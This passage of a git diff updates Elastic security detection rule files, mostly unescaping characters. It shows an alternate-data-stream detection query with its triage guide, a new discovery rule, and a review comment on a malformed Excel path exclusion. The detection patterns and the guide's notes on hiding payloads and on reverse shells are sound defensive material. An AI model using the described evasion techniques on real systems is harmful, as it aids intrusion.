(x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_112.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_112.json index 22532b5daf5..4e96535346c 100644 --- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_112.json +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_112.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \n (\"C:\\\\*:zone.identifier*\",\n \"C:\\\\users\\\\*\\\\appdata\\\\roaming\\\\microsoft\\\\teams\\\\old_weblogs_*:$DATA\") and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program 
Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
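Review bot: The process.executable exclusion list in the `query` context lines of this hunk contains `"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE"` with no space before `(x86)`, unlike every other entry, so that pattern appears never to match the real 32-bit Office path and ADS creations by 32-bit Excel keep alerting instead of being filtered — a noise defect rather than a detection gap, but one the exclusion was clearly meant to cover. The `file.extension` list in the same query also carries `"png"` twice. Because these `_<version>.json` files are published snapshots, the fix belongs in the rule source that produces the next version: `"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE"`, and drop the duplicate `"png"`. The same query text appears in the preceding hunk for an earlier version of this rule, whose start is outside this view.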
diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_102.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_102.json
index de350f62b31..55bf50d18e1 100644
--- a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_102.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 47,
 "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_103.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_103.json
index b4928d47a6a..87c521b6f3c 100644
--- a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_103.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 47,
 "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_104.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_104.json
index b8d7413e4be..5d625a6cf4a 100644
--- a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_104.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 47,
 "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_105.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_105.json
index 56601ff6284..a04fee34fa0 100644
--- a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_105.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 47,
 "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_106.json b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_106.json
index dca5f2b0110..1264003cf19 100644
--- a/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/71c5cb27-eca5-4151-bb47-64bc3f883270_106.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_101.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_101.json
index 079369a9207..f170e571e91 100644
--- a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_101.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_102.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_102.json
index a95e27ae257..a32761c3729 100644
--- a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_102.json b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_102.json
index 2fd4dfb5ecd..21d03121e00 100644
--- a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_102.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_103.json b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_103.json
index ebe362733df..f17c9d6a23f 100644
--- a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_103.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_104.json b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_104.json
index 5e90aa5b253..bc2a686e09a 100644
--- a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_104.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_105.json b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_105.json
index 1221f5b7473..b4be217b1f9 100644
--- a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_105.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_206.json b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_206.json
index 3b923ac038f..8db02e3449a 100644
--- a/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/729aa18d-06a6-41c7-b175-b65b739b1181_206.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_1.json b/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_1.json
index 68df969c8ec..6a544d86274 100644
--- a/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_1.json
@@ -47,7 +47,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_2.json b/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_2.json
new file mode 100644
index 00000000000..d1e84fcabc8
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/72ed9140-fe9d-4a34-a026-75b50e484b17_2.json
@@ -0,0 +1,65 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule leverages Discovery building block rule alert data to alert on signals with unusual unique host.id, user.id and process.executable entries.",
+ "from": "now-9m",
+ "history_window_start": "now-14d",
+ "index": [
+ ".alerts-security.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Unusual Discovery Signal Alert with Unusual Process Executable",
+ "new_terms_fields": [
+ "host.id",
+ "user.id",
+ "process.executable"
+ ],
+ "query": "host.os.type:windows and event.kind:signal and kibana.alert.rule.rule_id:\"1d72d014-e2ab-4707-b056-9b96abe7b511\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kibana.alert.rule.rule_id",
+ "type": "unknown"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "72ed9140-fe9d-4a34-a026-75b50e484b17",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Rule Type: Higher-Order Rule"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": []
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "new_terms",
+ "version": 2
+ },
+ "id": "72ed9140-fe9d-4a34-a026-75b50e484b17_2",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_104.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_104.json
index 0eaaaf3d587..2f8713e9f8f 100644
--- a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_104.json
